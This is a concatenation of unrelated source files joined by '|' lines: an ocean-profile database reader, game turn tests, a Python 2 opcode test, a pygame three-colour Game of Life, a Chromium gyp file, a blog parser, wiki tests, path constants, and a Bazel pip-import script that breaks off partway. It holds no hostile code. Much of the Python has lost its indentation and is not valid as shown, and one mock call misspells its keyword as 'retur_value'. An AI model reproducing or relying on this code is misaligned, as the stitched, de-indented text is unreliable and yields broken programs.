idx = iprof
output["IPROF"] = iprof
if header:
for key in key_header:
output[key] = f.variables[key][idx]
output["DATA_MODE"] = np.asarray(
[c for c in f.variables["DATA_MODE"][idx]])
if headerqc:
for key in key_headerqc:
output[key] = f.variables[key][idx]
if data:
for key in key_data:
if output["TSP_QC"] == "1":
output[key] = f.variables[key][idx, :]
else:
output[key] = np.NaN+np.zeros(
(output["N_PROF"], output["N_LEVELS"]))
if dataqc:
for key in key_dataqc:
if output["TSP_QC"] == "1":
output[key] = f.variables[key][idx]
else:
output[key] = np.zeros((output["N_PROF"],
output["N_LEVELS"]),
dtype=str)
output = bytes2str(unmask(output))
return output
if __name__ == '__main__':
dacs, wmos = get_all_wmos()
argo = read_argodb()
argo = update_argodb(argo, dacs, wmos)
write_argodb(argo)
|
# coding: utf-8
from aiohttp.test_utils import TestClient
import logging
import pytest
import serpyco
import unittest
import unittest.mock
from rolling.exception import NoCarriedResource
from rolling.kernel import Kernel
from rolling.model.measure import Unit
from rolling.server.document.affinity import AffinityDocument
from rolling.server.document.affinity import AffinityJoinType
from rolling.server.document.build import BuildDocument
from rolling.server.document.character import CharacterDocument
from rolling.server.document.stuff import StuffDocument
from rolling.server.lib.character import CharacterLib
from rolling.server.lib.stuff import StuffLib
from rolling.server.lib.turn import TurnLib
@pytest.fixture
def turn_lib(
worldmapc_kernel: Kernel,
worldmapc_with_zones_server_character_lib: CharacterLib,
worldmapc_with_zones_stuff_lib: StuffLib,
) -> TurnLib:
return TurnLib(
worldmapc_kernel,
character_lib=worldmapc_with_zones_server_character_lib,
stuff_lib=worldmapc_with_zones_stuff_lib,
logger=logging.getLogger("tests"),
)
@pytest.fixture
def build_a_on(worldmapc_kernel: Kernel) -> BuildDocument:
build_doc = BuildDocument(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
build_id="TEST_BUILD_3",
under_construction=False,
is_on=True,
)
worldmapc_kernel.server_db_session.add(build_doc)
worldmapc_kernel.server_db_session.commit()
return build_doc
@pytest.fixture
def build_a_off(worldmapc_kernel: Kernel) -> BuildDocument:
build_doc = BuildDocument(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
build_id="TEST_BUILD_3",
under_construction=False,
is_on=False,
)
worldmapc_kernel.server_db_session.add(build_doc)
worldmapc_kernel.server_db_session.commit()
return build_doc
@pytest.mark.usefixtures("initial_universe_state")
class TestExecuteTurn:
def test_alive_since_evolution(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
arthur: CharacterDocument,
) -> None:
session = worldmapc_kernel.server_db_session
session.refresh(xena)
session.refresh(arthur)
assert 0 == xena.alive_since
assert 0 == arthur.alive_since
turn_lib.execute_turn()
session.refresh(xena)
session.refresh(arthur)
assert 1 == xena.alive_since
assert 1 == arthur.alive_since
async def test_unit__character_die__ok__affinity_relations_discard(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
arthur: CharacterDocument,
worldmapc_web_app: TestClient,
descr_serializer: serpyco.Serializer,
) -> None:
session = worldmapc_kernel.server_db_session
session.refresh(xena)
session.refresh(arthur)
web = worldmapc_web_app
kernel = worldmapc_kernel
# fixtures
await web.post(f"/affinity/{xena.id}/new", json={"name": "MyAffinity"})
affinity: AffinityDocument = kernel.server_db_session.query(
AffinityDocument
).one()
affinity.join_type = AffinityJoinType.ACCEPT_ALL.value
kernel.server_db_session.add(affinity)
kernel.server_db_session.commit()
resp = await web.post(
f"/affinity/{arthur.id}/edit-relation/{affinity.id}?request=1&fighter=1"
)
assert 200 == resp.status
# see affinity
resp = await web.post(f"/affinity/{arthur.id}/see/{1}")
descr = descr_serializer.load(await resp.json())
assert "MyAffinity" == descr.title
assert "2 membre(s)" in descr.items[1].text
assert f"2 prêt(s)" in descr.items[1].text
# make turn kill arthur
arthur_doc = kernel.character_lib.get_document(arthur.id)
arthur_doc.life_points = 0
kernel.server_db_session.add(arthur_doc)
kernel.server_db_session.commit()
turn_lib.execute_turn()
arthur_doc = kernel.character_lib.get_document(arthur.id, dead=True)
assert not arthur_doc.alive
# see affinity
resp = await web.post(f"/affinity/{xena.id}/see/{1}")
descr = descr_serializer.load(await resp.json())
assert "MyAffinity" == descr.title
assert "1 membre(s)" in descr.items[1].text
assert f"1 prêt(s)" in descr.items[1].text
    # FIXME BS NOW: add a zone water test
# This test depend on game1 config !
@pytest.mark.parametrize(
"before_lp,"
"before_thirst,"
"before_bottle_filled,"
"after_lp,"
"after_thirst,"
"after_bottle_filled",
[
(1.0, 0.0, 1.0, 1.05, 2.0, 1.0),
(1.0, 20.0, 1.0, 1.05, 20.0, 0.96),
(1.0, 90.0, 1.0, 1.05, 42.0, 0.0),
(1.0, 100.0, 0.04, 1.05, 50.0, 0.0),
(1.0, 100.0, 0.0, 0.8, 100.0, 0.0),
],
)
def test_drink__ok__drink_one_bottle(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
before_lp: float,
before_thirst: float,
before_bottle_filled: float,
after_lp: float,
after_thirst: float,
after_bottle_filled: float,
) -> None:
# With
kernel = worldmapc_kernel
if before_bottle_filled:
stuff_doc = StuffDocument(
stuff_id="PLASTIC_BOTTLE_1L",
filled_value=1.0,
filled_capacity=1.0,
filled_unity=Unit.LITTER.value,
filled_with_resource="FRESH_WATER",
weight=2000.0,
clutter=0.5,
carried_by_id=xena.id,
)
kernel.server_db_session.add(stuff_doc)
kernel.server_db_session.commit()
xena.thirst = before_thirst
xena.life_points = before_lp
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == after_lp
assert float(xena.thirst) == after_thirst
if after_bottle_filled == 0.0:
pass
else:
stuff_doc = kernel.stuff_lib.get_stuff_doc(stuff_doc.id)
assert float(stuff_doc.filled_value) == after_bottle_filled
def test_drink__ok__drink_two_bottle(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
# With
kernel = worldmapc_kernel
stuff_doc = StuffDocument(
stuff_id="PLASTIC_BOTTLE_1L",
filled_value=1.0,
filled_capacity=1.0,
filled_unity=Unit.LITTER.value,
filled_with_resource="FRESH_WATER",
weight=2000.0,
clutter=0.5,
carried_by_id=xena.id,
)
kernel.server_db_session.add(stuff_doc)
stuff_doc2 = StuffDocument(
stuff_id="PLASTIC_BOTTLE_1L",
filled_value=0.5,
filled_capacity=1.0,
filled_unity=Unit.LITTER.value,
filled_with_resource="FRESH_WATER",
weight=1500.0,
clutter=0.5,
carried_by_id=xena.id,
)
kernel.server_db_session.add(stuff_doc2)
kernel.server_db_session.commit()
xena.thirst = 100.0
xena.life_points = 1.0
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == 1.05
assert float(xena.thirst) == 25.0
stuff_doc = kernel.stuff_lib.get_stuff_doc(stuff_doc.id)
assert stuff_doc.filled_value is None
stuff_doc2 = kernel.stuff_lib.get_stuff_doc(stuff_doc2.id)
assert stuff_doc2.filled_value is None
def test_drink__ok__drink_in_zone(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
# With
kernel = worldmapc_kernel
xena.thirst = 100.0
xena.life_points = 1.0
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
with unittest.mock.patch(
"rolling.util.is_there_resource_id_in_zone", retur_value=True
):
a = 1
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == 1.05
assert float(xena.thirst) == 20.0
# This test depend on game1 config !
@pytest.mark.parametrize(
"before_lp,"
"before_hunger,"
"before_vegetal_food_quantity,"
"after_lp,"
"after_hunger,"
"after_vegetal_food_quantity",
[
(1.0, 0.0, 1.0, 1.05, 1.0, 1.0),
(1.0, 20.0, 1.0, 1.05, 20.0, 0.96),
(1.0, 90.0, 1.0, 1.05, 66.0, 0.0),
(1.0, 100.0, 0.04, 1.0, 99.0, 0.0),
(1.0, 100.0, 0.0, 0.9, 100.0, 0.0),
],
)
def test_eat__ok__eat_one_resource(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
before_lp: float,
before_hunger: float,
before_vegetal_food_quantity: float,
after_lp: float,
after_hunger: float,
after_vegetal_food_quantity: float,
) -> None:
# With
kernel = worldmapc_kernel
if before_vegetal_food_quantity:
kernel.resource_lib.add_resource_to(
character_id=xena.id,
resource_id="VEGETAL_FOOD_FRESH",
quantity=before_vegetal_food_quantity,
)
xena.hunger = before_hunger
xena.life_points = before_lp
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == after_lp
assert xena.hunger == after_hunger
if after_vegetal_food_quantity == 0.0:
with pytest.raises(NoCarriedResource):
kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH"
)
else:
resource = kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH"
)
assert resource.quantity == after_vegetal_food_quantity
def test_eat__ok__eat_two_resource(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
# With
kernel = worldmapc_kernel
kernel.resource_lib.add_resource_to(
character_id=xena.id, resource_id="VEGETAL_FOOD_FRESH", quantity=1.01
)
kernel.resource_lib.add_resource_to(
character_id=xena.id, resource_id="VEGETAL_FOOD_FRESH2", quantity=100.0
)
xena.hunger = 100.0
xena.life_points = 1.0
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == 1.05
assert round(xena.hunger, 1) == 19.8
with pytest.raises(NoCarriedResource):
kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH"
)
r = kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH2"
)
assert round(r.quantity, 1) == 97.8
def test_eat__ko__eat_resource_but_not_enough(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
kernel = worldmapc_kernel
kernel.resource_lib.add_resource_to(
character_id=xena.id,
resource_id="VEGETAL_FOOD_FRESH",
quantity=0.5, # not enough
)
with unittest.mock.patch(
"rolling.server.effect.EffectManager.enable_effect"
) as fake_enable_effect:
turn_lib.execute_turn()
assert kernel.resource_lib.have_resource(
character_id=xena.id, resource_id="VEGETAL_FOOD_FRESH", quantity=0.46
)
assert not fake_enable_effect.called
def test_turn_build_consume_to_keep_on(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, build_a_on: BuildDocument
) -> None:
# Given
worldmapc_kernel.resource_lib.add_resource_to(
resource_id="BRANCHES", quantity=10.0, build_id=build_a_on.id
)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 10.0
assert build_a_on.is_on is True
# When
turn_lib.execute_turn()
# Then
build_a_on = worldmapc_kernel.build_lib.get_build_doc(build_a_on.id)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 9.99
assert build_a_on.is_on is True
def test_turn_build_consume_but_keep_off_because_not_enough(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, build_a_on: BuildDocument
):
# Given
worldmapc_kernel.resource_lib.add_resource_to(
resource_id="BRANCHES", quantity=0.001, build_id=build_a_on.id # not enough
)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 0.001
assert build_a_on.is_on is True
# When
turn_lib.execute_turn()
# Then
build_a_on = worldmapc_kernel.build_lib.get_build_doc(build_a_on.id)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 0.001
assert build_a_on.is_on is False
def test_turn_build_not_consume_because_off(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, build_a_off: BuildDocument
):
# Given
assert not worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_off.id
)
# When
turn_lib.execute_turn()
# Then
assert build_a_off.is_on is False
def test_turn_build_grow_ploughed_lands(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib
):
kernel = worldmapc_kernel
# Given
doc = kernel.build_lib.place_build(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
build_id="PLOUGHED_LAND",
under_construction=False,
)
doc.seeded_with = "CEREAL"
kernel.server_db_session.add(doc)
kernel.server_db_session.commit()
assert doc.grow_progress == 0
# When
turn_lib.execute_turn()
doc = kernel.build_lib.get_build_doc(doc.id)
        # Then
        assert doc.grow_progress == 42
        # When 2
        turn_lib.execute_turn()
        doc = kernel.build_lib.get_build_doc(doc.id)
        # Then 2
        assert doc.grow_progress == 42 * 2
def test_turn_clean_resources(self, worldmapc_kernel: Kernel, turn_lib: TurnLib):
# Given
worldmapc_kernel.resource_lib.add_resource_to(
resource_id="WOOD",
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
ground=True,
quantity=0.00000001,
)
# When
assert worldmapc_kernel.resource_lib.get_ground_resource(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
)
turn_lib.execute_turn()
# Then
assert not worldmapc_kernel.resource_lib.get_ground_resource(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
)
|
# Python test set -- part 2, opcodes
from test_support import *
print '2. Opcodes'
print 'XXX Not yet fully implemented'
print '2.1 try inside for loop'
n = 0
for i in range(10):
n = n+i
try: 1/0
except NameError: pass
except ZeroDivisionError: pass
except TypeError: pass
try: pass
except: pass
try: pass
finally: pass
n = n+i
if n != 90:
raise TestFailed, 'try inside for'
print '2.2 raise class exceptions'
class AClass: pass
class BClass(AClass): pass
class CClass: pass
class DClass(AClass):
def __init__(self, ignore):
pass
try: raise AClass()
except: pass
try: raise AClass()
except AClass: pass
try: raise BClass()
except AClass: pass
try: raise BClass()
except CClass: raise TestFailed
except: pass
a = AClass()
b = BClass()
try: raise AClass, b
except BClass, v:
if v != b: raise TestFailed, "v!=b"
else: raise TestFailed, "no exception"
try: raise b
except AClass, v:
if v != b: raise TestFailed, "v!=b AClass"
# not enough arguments
try: raise BClass, a
except TypeError: pass
try: raise DClass, a
except DClass, v:
if not isinstance(v, DClass):
raise TestFailed, "v not DClass"
print '2.3 comparing function objects'
f = eval('lambda: None')
g = eval('lambda: None')
if f == g: raise TestFailed, "functions should not be same"
f = eval('lambda a: a')
g = eval('lambda a: a')
if f == g: raise TestFailed, "functions should not be same"
f = eval('lambda a=1: a')
g = eval('lambda a=1: a')
if f == g: raise TestFailed, "functions should not be same"
f = eval('lambda: 0')
g = eval('lambda: 1')
if f == g: raise TestFailed
f = eval('lambda: None')
g = eval('lambda a: None')
if f == g: raise TestFailed
f = eval('lambda a: None')
g = eval('lambda b: None')
if f == g: raise TestFailed
f = eval('lambda a: None')
g = eval('lambda a=None: None')
if f == g: raise TestFailed
f = eval('lambda a=0: None')
g = eval('lambda a=1: None')
if f == g: raise TestFailed
|
#!/usr/bin/env python
# life.py simulates John Conway's Game of Life with random initial states
# -----------------------------------------------------------------------------
import sys, random, pygame
from pygame.locals import *
# -----------------------------------------------------------------------------
# GLOBALS
# The title and version of this program
title, version = "The Game of Life", "1.0"
# The dimensions of each cell (in pixels)
cell_dimensions = (5,5)
# The framerate of the game (in milliseconds)
framerate = 1000
# The fraction of the board occupied by cells when randomly generated
occupancy = 0.33
# Colors used to represent the cells
colors = { 0:(0,0,0), 1:(200,0,0), 2:(0,200,0), 3:(0,0,200) }
# -----------------------------------------------------------------------------
# FUNCTIONS
# Main function
def main(args):
# Get the board dimensions (in cells, not pixels) from command-line input
if len(args) != 3: sys.exit("USAGE: life.py X_CELLS Y_CELLS")
board_dimensions = (int(args[1]),int(args[2]))
# Initialize pygame elements
screen, bg, clock = init(board_dimensions)
# Initialize random board
board, next_board = make_random_board(board_dimensions)
# Enter the game loop
quit_game = False
wave_count = 0
while not quit_game:
# Slow things down to match the framerate
clock.tick(framerate)
# Update the board
etat_cell0 = update_board(board, next_board)
        if etat_cell0:  # etat_cell0 is true when cell (0,0) did not change this step
            wave_count += 1
        else:
print "Steps since last change :", wave_count
wave_count = 0
# Draw the board on the background
draw_board(board, bg)
# Blit bg to the screen, flip display buffers
screen.blit(bg, (0,0))
pygame.display.flip()
# Queue user input to catch QUIT signals
for e in pygame.event.get():
if e.type == QUIT: quit_game = True
# Print farewell message
print "Thanks for watching!"
# Initialize pygame elements
def init(board_dimensions):
# Grab hard-coded global values
global title, version, cell_dimensions
# Initialize the pygame modules
pygame.init()
# Determine and set the screen dimensions
dimensions = (board_dimensions[0]*cell_dimensions[0],
board_dimensions[1]*cell_dimensions[1])
screen = pygame.display.set_mode(dimensions)
# Set the title string of the root window
pygame.display.set_caption(title+" "+version)
# Grab the background surface of the screen
bg = screen.convert()
# Grab the game clock
clock = pygame.time.Clock()
# Return the screen, the background surface, and the game clock
return screen, bg, clock
# Create a "seed" board of given dimensions at random
def make_random_board(board_dimensions):
# Grab hard-coded global values
global occupancy
occ_div = 1
# Instantiate the board as a dictionary with a fraction occupied
# 0 indicates an empty cell; 1 indicates an occupied cell
board = dict()
for x in range(board_dimensions[0]):
for y in range(board_dimensions[1]):
nb_hasard = random.random()
if nb_hasard < (occupancy /occ_div) : board[(x,y)] = 1
elif nb_hasard < (2*occupancy/occ_div) : board[(x,y)] = 2
elif nb_hasard < (3*occupancy/occ_div) : board[(x,y)] = 3
else: board[(x,y)] = 0
next_board = dict()
for x in range(board_dimensions[0]):
for y in range(board_dimensions[1]):
next_board[(x,y)] = board[(x,y)]
# Return the board
return board, next_board
# Update the board according to the rules of the game
def update_board(board, next_board):
nb_sup = 2
# For every cell in the board...
for cell in board:
# How many occupied neighbors does this cell have?
score_type1, score_type2, score_type3 = count_neighbors(cell, board)
        # A coloured cell is converted when more than nb_sup neighbours of the colour
        # that dominates it are present (1 -> 3, 2 -> 1, 3 -> 2); an empty cell takes
        # the most common neighbouring colour when that colour's score exceeds 5
if board[cell] == 1:
if score_type3 > nb_sup :
next_board[cell] = 3
elif board[cell] == 2:
if score_type1 > nb_sup :
next_board[cell] = 1
elif board[cell] == 3:
if score_type2 > nb_sup :
next_board[cell] = 2
else :
max_score = max(score_type1, score_type2, score_type3)
if max_score > 5 :
if max_score == score_type1 :
next_board[cell] = 1
if max_score == score_type2 :
next_board[cell] = 2
if max_score == score_type3 :
next_board[cell] = 3
# Now, go through it again, making all the approved changes
etat_cell0 = (board[(0,0)] == next_board[(0,0)])
for cell in board:
board[cell] = next_board[cell]
return etat_cell0
# Return the number of occupied neighbors this cell has
def count_neighbors(cell, board):
# Figure out the potential neighboring cells (need to watch the edges)
neighbors = [ (cell[0]-1,cell[1]), (cell[0]-1,cell[1]-1),
(cell[0],cell[1]-1), (cell[0]+1,cell[1]-1),
(cell[0]+1,cell[1]), (cell[0]+1,cell[1]+1),
(cell[0],cell[1]+1), (cell[0]-1,cell[1]+1) ]
# For each potential neighbor, if the cell is occupied add one to the score
score_type1 = 0
score_type2 = 0
score_type3 = 0
for neighbor in neighbors:
# Is this a real neighbor, or is it out-of-bounds?
        if neighbor in board:
# Remember that neighbors which are marked for death count, too!
if board[neighbor] == 1: score_type1 += 1
if board[neighbor] == 2: score_type2 += 1
if board[neighbor] == 3: score_type3 += 1
# Return the score
return score_type1, score_type2, score_type3
# Draw the board on the background
def draw_board(board, bg):
# Grab hard-coded global values
global cell_dimensions
# Draw every cell in the board as a rectangle on the screen
for cell in board:
rectangle = (cell[0]*cell_dimensions[0],cell[1]*cell_dimensions[1],
cell_dimensions[0],cell_dimensions[1])
pygame.draw.rect(bg, colors[board[cell]], rectangle)
# -----------------------------------------------------------------------------
# The following code is executed upon command-line invocation
if __name__ == "__main__": main(sys.argv)
# -----------------------------------------------------------------------------
# EOF
__author__ = 'Dessalles'
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'modules_generated.gypi',
'../bindings/scripts/scripts.gypi',
'../build/features.gypi',
'../build/scripts/scripts.gypi',
],
'targets': [
{
# GN version: //third_party/WebKit/Source/modules:make_modules_generated
'target_name': 'make_modules_generated',
'type': 'none',
'hard_dependency': 1,
'dependencies': [
'../bindings/modules/generated.gyp:modules_event_generated',
'../config.gyp:config',
],
'actions': [
{
'action_name': 'IndexedDBNames',
'inputs': [
'<@(make_names_files)',
'indexeddb/IndexedDBNames.in',
],
'outputs': [
'<(blink_modules_output_dir)/IndexedDBNames.cpp',
'<(blink_modules_output_dir)/IndexedDBNames.h',
],
'action': [
'python',
'../build/scripts/make_names.py',
'indexeddb/IndexedDBNames.in',
'--output_dir',
'<(blink_modules_output_dir)',
],
},
],
},
],
}
|
# -*- coding: utf-8 -*-
from src.lib.SinaBlog_parser.tools.parser_tools import ParserTools
from src.tools.match import Match
from src.tools.debug import Debug
class SinaBlogArticle(ParserTools):
def __init__(self, dom=None):
if dom:
# Debug.logger.debug(u"SinaBlogArticle中,YESSSSSSSSSSSSSSSSSS")
pass
self.set_dom(dom)
self.info = {}
# self.body = self.dom.find('div', class_='SG_conn')
# if dom:
# self.body = dom.find('div', class_='SG_conn', id='module_920')
# if self.body:
# content = self.get_tag_content(self.body)
# self.content = BeautifulSoup(Match.fix_html(content), 'lxml')
return
def set_dom(self, dom):
if dom:
self.dom = dom
return
def get_info(self):
answer_info = self.parse_info()
return answer_info
def parse_info(self):
self.parse_author_id()
self.parse_author_name()
self.parse_article_id()
self.parse_article_title()
        self.parse_answer_content()  # parse the article body content
# self.parse_href()
# self.parse_comment() # TODO
# self.parse_publish_data() # TODO
return self.info
    def parse_answer_content(self):
        u"""
        Parse the article body content
        :return:
        """
        article_body = self.dom.find('div', class_='articalContent')
        # article_body = self.dom.find('div', class_='articalContent')
        # article_body = self.dom.find('div', id='sina_keyword_ad_area2')
        # article_body = self.dom.select('#sina_keyword_ad_area2')[0]
        # article_body = self.dom.select('div.articalContent')
        if not article_body:
            Debug.logger.debug(u"Article body not found")
            return
        article_body = str(article_body)
        self.info['content'] = article_body
    def parse_author_id(self):  # TODO this part could avoid repeated parsing
        u"""
        Parse the author_id
        :return:
        """
        author_id_href = False
        author_id = self.dom.select('div.blognavInfo span a')
        if author_id:
            author_id_href = ParserTools.get_attr(author_id[1], 'href')  # creator_id[0] is the homepage link
        if not author_id_href:
            Debug.logger.debug(u"creator_id not found")
            return
        result = Match.SinaBlog_profile(author_id_href)
        SinaBlog_id = result.group('SinaBlog_people_id')
        self.info['author_id'] = SinaBlog_id
    def parse_author_name(self):
        u"""
        Parse the author's name
        :return:
        """
        author_name = self.dom.select('div.info_nm span strong')  # get creator_name
        if not author_name:
            Debug.logger.debug(u"Blog author name not found")
            return
        author_name = author_name[0].get_text().replace(' ', '').replace('\n', '').replace('\t', '').replace('\r', '')
        self.info['author_name'] = author_name
    def parse_article_id(self):
        u"""
        Parse the article id
        :return:
        """
        article_id = False
        id = self.dom.select('div.artical h2')
        if id:
            article_id = ParserTools.get_attr(id[0], 'id')
        if not article_id:
            Debug.logger.debug(u"Article id not found")
            return
        article_id = article_id[2:]
        self.info['article_id'] = article_id
    def parse_article_title(self):
        u"""
        Parse the article title
        :return:
        """
        article_title = False
        title = self.dom.select('div.articalTitle h2')
        if title:
            article_title = title[0].get_text()
        if not article_title:
            Debug.logger.debug(u"Article title not found")
            return
        # Titles containing '&' break the output otherwise; there is probably a better way to handle this
        self.info['title'] = article_title.replace('&', '&amp;').replace('<<', "《").replace('>>', "》")
|
from wiki import *
from traverse import *
def test_create_pages():
root_page = WikiPage(title="FrontPage", text="some text on the root page", tags={"foo", "bar"})
child_page = WikiPage(title="Child1", text="a child page", tags={"foo"})
root_page.add_child(child_page)
assert root_page.title == "FrontPage"
assert "Child1" in map(lambda x: x.title, root_page.children)
assert "FrontPage" in map(lambda x: x.title, child_page.parents)
def test_uri():
root_page = WikiPage(title="FrontPage", text="some text on the root page", tags={"foo", "bar"}, uri="/")
child_page = WikiPage(title="Child1", text="a child page", tags={"foo"})
root_page.add_child(child_page)
grandchild_page = WikiPage(title="Child2", text="a child page", tags={"foo"})
child_page.add_child(grandchild_page)
assert root_page.uri == "/"
assert child_page.uri == "/Child1"
assert grandchild_page.uri == "/Child1/Child2" |
# Global constants
# Dataset locations
IMDB_OSCD = "~/Datasets/OSCDDataset/"
IMDB_AIRCHANGE = "~/Datasets/SZTAKI_AirChange_Benchmark/"
# Template strings
CKP_LATEST = "checkpoint_latest.pth"
CKP_BEST = "model_best.pth"
CKP_COUNTED = "checkpoint_{e:03d}.pth"
|
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The piptool module imports pip requirements into Bazel rules."""
import argparse
import atexit
import os
import pkgutil
# import pkg_resources
import shutil
import sys
import tempfile
import textwrap
# Note: We carefully import the following modules in a particular
# order, since these modules modify the import path and machinery.
import pkg_resources
if sys.version_info < (3, 0):
_WHL_LIBRARY_RULE = 'whl_library'
else:
_WHL_LIBRARY_RULE = 'whl3_library'
def _extract_packages(package_names):
"""Extract zipfile contents to disk and add to import path"""
# Set a safe extraction dir
extraction_tmpdir = tempfile.mkdtemp()
atexit.register(
lambda: shutil.rmtree(extraction_tmpdir, ignore_errors=True))
pkg_resources.set_extraction_path(extraction_tmpdir)
# Extract each package to disk
dirs_to_add = []
for package_name in package_names:
req = pkg_resources.Requirement.parse(package_name)
extraction_dir = pkg_resources.resource_filename(req, '')
dirs_to_add.append(extraction_dir)
# Add extracted directories to import path ahead of their zip file
# counterparts.
sys.path[0:0] = dirs_to_add
existing_pythonpath = os.environ.get('PYTHONPATH')
if existing_pythonpath:
dirs_to_add.extend(existing_pythonpath.split(':'))
os.environ['PYTHONPATH'] = ':'.join(dirs_to_add)
# Wheel, pip, and setuptools are much happier running from actual
# files on disk, rather than entries in a zipfile. Extract zipfile
# contents, add those contents to the path, then import them.
_extract_packages(['pip', 'setuptools', 'wheel'])
# Defeat pip's attempt to mangle sys.path
_SAVED_SYS_PATH = sys.path
sys.path = sys.path[:]
import pip # pylint: disable=C0413
sys.path = _SAVED_SYS_PATH
# import setuptools
# import wheel
def _pip_main(argv):
# Extract the certificates from the PAR following the example of get-pip.py
# https://github.com/pypa/get-pip/blob/430ba37776ae2ad89/template.py#L164-L168
cert_path = os.path.join(tempfile.mkdtemp(), "cacert.pem")
with open(cert_path, "wb") as cert:
cert.write(pkgutil.get_data("pip._vendor.requests", "cacert.pem"))
argv = ["--disable-pip-version-check", "--cert", cert_path] + argv
return pip.main(argv)
from rules_python.whl import Wheel # pylint: disable=C0413
def main():
args = _parse_args()
# https://github.com/pypa/pip/blob/9.0.1/pip/__init__.py#L209
if _pip_main(["wheel", "-w", args.directory, "-r", args.input]):
sys.exit(1)
# Enumerate the .whl files we downloaded.
def list_whl_files():
dir_ = args.directory + '/'
for root, unused_dirnames, filenames in os.walk(dir_):
for fname in filenames:
if fname.endswith('.whl'):
yield os.path.join(root, fname)
wheels = [Wheel(path) for path in list_whl_files()]
bzl_file_content = _make_bzl_file_content(
wheels=wheels,
reqs_repo_name=args.name,
input_requirements_file_path=args.input)
with open(args.output, 'w') as file_obj:
file_obj.write(bzl_file_content)
def _parse_args():
parser = argparse.ArgumentParser(
description='Import Python dependencies into Bazel.')
parser.add_argument(
'--name', action='store', help='The namespace of the import.')
parser.add_argument(
'--input', action='store', help='The requirements.txt file to import.')
parser.add_argument(
'--output',
action='store',
help='The requirements.bzl file to export.')
parser.add_argument(
'--directory',
action='store',
help='The directory into which to put .whl files.')
return parser.parse_args()
def _make_bzl_file_content(wheels, reqs_repo_name,
input_requirements_file_path):
wheel_to_extras = _make_wheel_to_extras(wheels)
join_str = ',\n '
pypi_name_to_py_library = join_str.join([
join_str.join([
'"{pypi_name}": "@{wheel_name}//:pkg"'.format(
pypi_name=wheel.distribution().lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
] + [
# For every extra that is possible from this requirements.txt
'"{pypi_name}[{extra}]": "@{wheel_name}//:{extra}"'.format(
pypi_name=wheel.distribution().lower(),
extra=extra.lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
for extra in wheel_to_extras.get(wheel, [])
]) for wheel in wheels
])
pypi_name_to_whl_filegroup = join_str.join([
join_str.join([
'"{pypi_name}": "@{wheel_name}//:whl"'.format(
pypi_name=wheel.distribution().lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
] + [
# For every extra that is possible from this requirements.txt
'"{pypi_name}[{extra}]": "@{wheel_name}//:{extra}_whl"'.format(
